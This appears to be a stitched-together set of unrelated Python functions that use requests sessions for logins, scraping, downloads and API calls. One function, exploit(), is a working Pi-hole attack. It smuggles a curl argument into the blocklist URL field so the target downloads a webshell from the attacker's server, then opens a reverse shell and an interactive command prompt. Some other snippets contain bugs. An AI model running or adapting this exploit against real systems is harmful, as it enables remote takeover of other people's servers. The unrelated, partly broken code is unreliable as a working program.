def _connect(url: str, data: str=None, headers: dict or None=None, auth=None, session: requests.session=__SESSION) -> requests.Response: """ :param url: url :type url: :class:`str` :param data: data to post :type data: :class:`str` :param headers: headers to send :type headers: :class:`dict` or :class:`None` :param auth: the authenticate for the session. :type auth: :class:`requests.auth.HTTPBasicAuth` :param session: the session to connect to, otherwise using the default ones. :type session: :class:`requests.Session` :return: the respond of the connection :rtype: :class:`requests.Response` """ if headers is None: headers = dict() url = url_fixer(url) headers['User-Agent'] = consts.USER_AGENT if data is not None: sock = session.post(url, data=data, headers=headers, auth=auth) else: sock = session.get(url, headers=headers, auth=auth) return sock
def session(self, base_url="http://baseserver"): """ mount it to session object any request will start using URL given by prefix base_url """ session = RequestsSession() session.mount(prefix=base_url, adapter=RequestWSGIAdapter(self)) return session
def login(session: requests.session, account: str, password: str, captcha_code=None, save_captcha=False): """Login to Mo Online. Arguments: session {requests.session} -- requests session. account {str} -- game account. password {str} -- game password. captcha {str} -- captcha code. Raises: LoginError: description: error_type server_error: Server timeout or error account_error: User password or account error captcha_error: captcha code error. Returns: [str] -- game login url. (moop) """ page = session.get(url=LOGIN_URL, timeout=TIMEOUT) if not isinstance(captcha_code, str): get_captcha(session) captcha_code = input("input captcha code: ") csrf_parse(page.text) login_data = { 'loginAccount': account, 'loginPassword': password, 'loginCode': captcha_code, 'contract1': 'on', 'contract2': 'on', 'contract3': 'on', **csrf_parse(page.text) } post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data) if post_login.url == START_GAME_URL and post_login.status_code == 200: _base_index = post_login.text.find('window.location.href') + 24 return post_login.text[_base_index:post_login.text. find('"', _base_index + 1)] elif post_login.textfind("密碼錯誤") > -1: raise LoginError(error_type='account_error', account=account, message="account or password wrong.") elif post_login.textfind("驗證碼輸入不正確") > -1: raise LoginError(error_type='captcha_error', account=account, message="captcha code error.") raise BaseException("Something error :(")
def retrieve(url): session = RequestSession() headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3' } request = session.get(url, headers=headers) if not request.ok: return False res = BytesIO() res.write(request.content) return res
def exploit(session: requests.session) -> None: print( f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}" ) # Get csrf token #print("[*] Getting CSRF-token") html = session.get(url=f"{url}settings.php?tab=blocklists", proxies=proxy).text soup = BeautifulSoup(html, 'html.parser') token = soup.find("input", {'name': 'token'})['value'] # Stage 1: Trigger connection to our server payload = f'http://{get_ip()}# -o ex.php -d "' data = { 'newuserlists': payload, 'token': token, 'field': 'adlists', 'submit': 'saveupdate' } session.post(url=f"{url}settings.php?tab=blocklists", data=data, proxies=proxy) # Setup http server http = Process(target=setup_http) http.daemon = True http.start() # Trigger access & file write for i in range(2): session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php", proxies=proxy) # Verify webshell if verify_webshell(): print("[+] Webshell uploaded successfully!") rev_shell() try: while True: cmd = input("cmd> ") print(exec(cmd)) except KeyboardInterrupt: quit() except Exception as ex: raise ex else: raise Exception("Webshell not uploaded!")
def get_authentication_data(s: requests.session, contract_number: str): data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_AUTHENTICATION.asp?contractid={}&op=0'\ .format(contract_number)) data.encoding = 'gbk' soup = BeautifulSoup(data.text, "lxml") data_dict = {} info_dict = {} cargo_list = [] tables = soup.find_all('table') trs = tables[8].find_all('tr') tds = trs[1].find_all('td') info_dict['目的港'] = tds[0].contents[0].rstrip().lstrip() info_dict['状态'] = tds[1].find('p').contents[0].rstrip().lstrip() info_dict['一般原产地证书'] = tds[2].find('p').contents[0].rstrip().lstrip() info_dict['普惠制原产地证书'] = tds[3].contents[0].rstrip().lstrip() info_dict['认证费用'] = tds[4].contents[0].rstrip().lstrip() for idx, tr in enumerate(tables[11].find_all('tr')): if idx != 0: tds = tr.find_all('td') cargo_dict = {} cargo_dict['货号'] = tds[0].find('a').contents[0].rstrip().lstrip() cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip() cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip() cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip() cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip() cargo_list.append(cargo_dict) data_dict["货物信息"] = cargo_list data_dict['检验程序'] = info_dict return data_dict
def get_sysconf(s: requests.session, page: str, act: str, params): return s.get(url=sysconf, params=dict({ "page": page, "action": act }, **params), verify=False)
def download(self, item): """ Downloads a single file and returns the HTTP response. """ if self.session is None: self.session = RequestSession() try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3' } url = item['url'] request = self.session.get(url, headers=headers) response = { 'url': url, 'httpcode': request.status_code, 'status': request.ok, 'content-type': request.headers.get('Content-Type') } if request.ok: response['content'] = request.content return {'item': item, 'response': response} except RequestException as e: print('[error]', e) return { 'item': item, 'response': { 'status': False, 'error': e, 'url': item['url'] } }
def get_captcha(session: requests.session): image_data = session.get(url=CAPTCHA_IMAGE_URL, timeout=TIMEOUT) io_file = io.BytesIO(image_data.content) image = Image.open(io_file) image.show() return io_file
def update_gitee_gist(session: requests.session, host_content): gitee_token = os.getenv("gitee_token") gitee_gist_id = os.getenv("gitee_gist_id") gist_file_name = os.getenv("gitee_gist_file_name") url = "https://gitee.com/api/v5/gists/{}".format(gitee_gist_id) headers = {"Content-Type": "application/json"} data = { "access_token": gitee_token, "files": { gist_file_name: { "content": host_content } }, "public": "true" } json_data = json.dumps(data) try: response = session.patch(url, data=json_data, headers=headers, timeout=20) if response.status_code == 200: print("update gitee gist success") else: print("update gitee gist fail: {} {}".format( response.status_code, response.content)) except Exception as e: traceback.print_exc(e) raise Exception(e)
def get_recent_news_articles(session: requests.session) -> List[Dict[str, str]]: """ Fetches the most recent news articles for the logged in player :param: The requests session initialized by the ComunioSession :return: List of article dictionaries with the following attributes: - date: The article's date - type: The type of the article, e.g. 'transfers' - content: The article's content """ html = session.get("http://www.comunio.de/team_news.phtml").text soup = BeautifulSoup(html, "html.parser") article_headers = soup.select(".article_header1") + soup.select(".article_header2") article_content = soup.select(".article_content1") + soup.select(".article_content2") articles = [] for index in range(0, len(article_headers)): header = article_headers[index].text.lstrip().rstrip() content = article_content[index].text.lstrip().rstrip() article = { "date": header.split(" ", 1)[0], "type": header.split(" > ", 1)[1], "content": content } articles.append(article) return articles
def fetch_page(*, url: str, session: requests.session): req = session.get(url) body = req.text if not req.from_cache: # stderr('sleep 5') time.sleep(5) interactive_warning = '<title>Interactive Stories Are Temporarily Unavailable</title>' while interactive_warning in body: sleep_for_url(url) cache_backend.delete_url(url) req = session.get(url) body = req.text return body
def check_captcha(s: requests.session, captcha: str): r = s.post("https://pass.changyan.com/api/checkCaptcha", data={ "t": "normal", "c": captcha }) return r.json().get("ok")
def apost(asession: session, url, data={}): burp0_url = buildURL(asession, url, {}) burp0_cookies = {"ATERNOS_SEC_7bawidcle0t00000": "3uayvfdrudm00000"} for cookie in asession.cookies.get_dict(): if "_SEC_" in cookie: burp0_cookies = { cookie: asession.cookies.get(cookie), } burp0_headers = { "Connection": "close", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://aternos.org", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://aternos.org/go/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" } # burp0_data = { # "user": "******", # "password": "******" # } return asession.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=data)
def post_sysconf(s: requests.session, page: str, act: str, params, data): return s.post(url=sysconf, params=dict({ "page": page, "action": act }, **params), data=data, verify=False)
def getInspections(after: datetime, session: requests.session, headers: dict): ''' Get all inspections after (after: ISO Datetime) ''' query = f"https://api.safetyculture.io/audits/search?field=audit_id&field=modified_at&modified_after={after}Z" results = session.get(query, headers=headers) results = results.json() return (results)
def __init__(self): super().__init__(None) self._status = False # 没有在运行 self._session = RqSession() # 创建会话 self._session.headers = HEADERS self._content = None # 搜索内容 self._detail_urls = Queue() # 详情页队列 self._stop = False # 是否停止
def downloader(session: requests.session, url: str, filename: str, **kwargs): with session.get(url, stream=True, **kwargs) as r: if r.status_code == 200: r.raw.decode_content = True with open(filename, "wb") as f: shutil.copyfileobj(r.raw, f) else: raise Exception("Failed to connect")
def scap(r: requests.session, image): try: re = r.post("https://bili.dev:2233/captcha", json={'image': base64.b64encode(image).decode("utf-8")}) re = re.json() except: return None return re['message'] if re and re["code"] == 0 else None
def get_sysconf_with_sid_header(s: requests.session, page: str, act: str, params): return s.get(url=sysconf, params=dict({ "page": page, "action": act }, **params), verify=False, headers={"sid": s.cookies.get("sid")})
async def checkPages(s: requests.session): for a in range(0, len(urlList)): res1 = s.get(url=urlList[a], allow_redirects=False) if not (urlResultlist[a] in res1.text): print(res1.text) f = open("page.html", 'w', encoding="utf-8") f.write(res1.text) f.close() return False return True
def get_locations( s: requests.session ) -> list: ''' Retrieve latest locations from API ''' ims_locations_url = f'https://{env.ims_ip}/api/location_stats/latest_by_asset/?format=json&limit=100000' locations = s.get(ims_locations_url, verify=False) locations = locations.json() return(locations)
async def loadPages(s: requests.session): for a in range(0, len(urlList)): res1 = s.get(urlList[a]) res = re.search(regexList[a], res1.text).group(1) print(urlList[a]) print(res) print() print() print() urlResultlist.append(res)
def get_own_player_list(session: requests.session) -> List[Dict[str, str or int]]: """ Creates dictionaries modelling the user's current players and returns them in a list. The format of these dictionaries is: name: The player's name value: The player's current value points: The player's currently accumulated performance points position: The player's position :param: The requests session initialized by the ComunioSession :return: A list of the user's players as dictionaries """ player_list = [] sell_html = session.get("http://www.comunio.de/putOnExchangemarket.phtml") on_sale_html = session.get("http://www.comunio.de/exchangemarket.phtml?takeplayeroff_x=22") soups = (BeautifulSoup(sell_html.text, "html.parser"), BeautifulSoup(on_sale_html.text, "html.parser")) for i, soup in enumerate(soups): players = soup.select(".tr1") + soup.select(".tr2") for player in players: attrs = player.select("td") if i == 0: player_info = {"name": attrs[0].text.strip(), "value": int(attrs[2].text.strip().replace(".", "")), "points": int(attrs[3].text.strip()), "position": attrs[4].text.strip()} elif i == 1: player_info = {"name": attrs[1].text.strip(), "value": int(attrs[4].text.strip().replace(".", "")), "points": int(attrs[5].text.strip()), "position": attrs[7].text.strip()} else: player_info = {} player_list.append(player_info) return player_list
def renew(sess_id: str, session: requests.session, password: str, order_id: str) -> bool: url = "https://support.euserv.com/index.iphp" headers = { "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/83.0.4103.116 Safari/537.36", "Host": "support.euserv.com", "origin": "https://support.euserv.com", "Referer": "https://support.euserv.com/index.iphp" } data = { "Submit": "Extend contract", "sess_id": sess_id, "ord_no": order_id, "subaction": "choose_order", "choose_order_subaction": "show_contract_details" } session.post(url, headers=headers, data=data) data = { "sess_id": sess_id, "subaction": "kc2_security_password_get_token", "prefix": "kc2_customer_contract_details_extend_contract_", "password": password } f = session.post(url, headers=headers, data=data) f.raise_for_status() if not json.loads(f.text)["rs"] == "success": return False token = json.loads(f.text)["token"]["value"] data = { "sess_id": sess_id, "ord_id": order_id, "subaction": "kc2_customer_contract_details_extend_contract_term", "token": token } session.post(url, headers=headers, data=data) time.sleep(5) return True
def check_is_student(s: requests.session) -> bool: """判断用户是否为学生 Args: s (requests.session): session Returns: bool: """ url = s.get("https://www.zhixue.com/container/container/index/").url return "student" in url
def dolike(ses: requests.session, to_userid: str, type: int = 1): data = json.dumps({"from": "1", "toUserId": to_userid, "type": str(type)}) sign = get_md5_code(data) res = ses.post(host + '/api/center/doLike', data={ 'sign': sign, 'data': data }) if res.json()['code'] != 200: print(res.text) raise Exception
def download(url, local_path=None): filename = os.path.basename(url) local_file_path = os.path.join(tempfile.gettempdir(), filename) if local_path is not None and os.path.isdir(local_path): local_file_path = os.path.join(local_path, filename) session = RequestSession() headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3' } request = session.get(url, headers=headers) if not request.ok: return False with open(local_file_path, 'wb') as fh: fh.write(request.content) return local_file_path
def getHTMLText(url: str, rssion: requests.session) -> str: try: resp = rssion.get(url, headers=PttInfo.headers) resp.raise_for_status() resp.encoding = resp.apparent_encoding return resp.text except: print("url: "+url) print("request: "+resp.request) print("響應: "+resp.status_code) return "error resp"
def __init__(self, processed_callback, multi=False, bulksize=50, stateless=True, state_id=None, verbose=False, auto_save_states=False): self.__process_callback = processed_callback self.multi = multi self.bulksize = bulksize self.stateless = stateless self.__auto_save_states = auto_save_states self.session = RequestSession() self.stats = { 'total_images': 0, 'total_duration': 0, 'average_duration': 0, 'average_queue_count': 0, 'ignored': { 'total': 0, 'files': {} }, 'downloads': { 'total_successes': 0, 'total_errors': 0, 'successes': {}, 'errors': {} }, 'uploads': { 'total_successes': 0, 'total_errors': 0, 'successes': {}, 'errors': {} } } self.__processes_queue_counts = [] self.__processes_durations = [] self.identicals = {} if not self.stateless: self.state_id = state_id if self.state_id is None: from uuid import uuid4 self.state_id = str(uuid4()) self.states = {} self.old_states = {} self.verbose = verbose
def validate_session(session: requests.session) -> bool: # Validate by visit settings, anonymous user will be redirected # to login page. settings_url = "https://www.zhihu.com/settings/profile" verify_rsp = session.get(settings_url) if not (verify_rsp.url == settings_url): obsolete_session_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), SESSION_FILENAME) if os.path.exists(obsolete_session_file): os.remove(obsolete_session_file) raise ValueError("check COOKIE_VALUE in settings.py.") return True
def _process_request( self, request: Request, session: requests.session ): # type: (Request, requests.Session)->None """ Sending request to server and get result. """ # noinspection PyBroadException try: request = self.sign(request) url = self.make_full_url(request.path) response = session.request( request.method, url, headers=request.headers, params=request.params, data=request.data, proxies=self.proxies, ) request.response = response status_code = response.status_code if status_code / 100 == 2: # 2xx都算成功,尽管交易所都用200 jsonBody = response.json() request.callback(jsonBody, request) request.status = RequestStatus.success else: request.status = RequestStatus.failed if request.on_failed: request.on_failed(status_code, request) else: self.on_failed(status_code, request) except: # noqa request.status = RequestStatus.error t, v, tb = sys.exc_info() if request.on_error: request.on_error(t, v, tb, request) else: self.on_error(t, v, tb, request)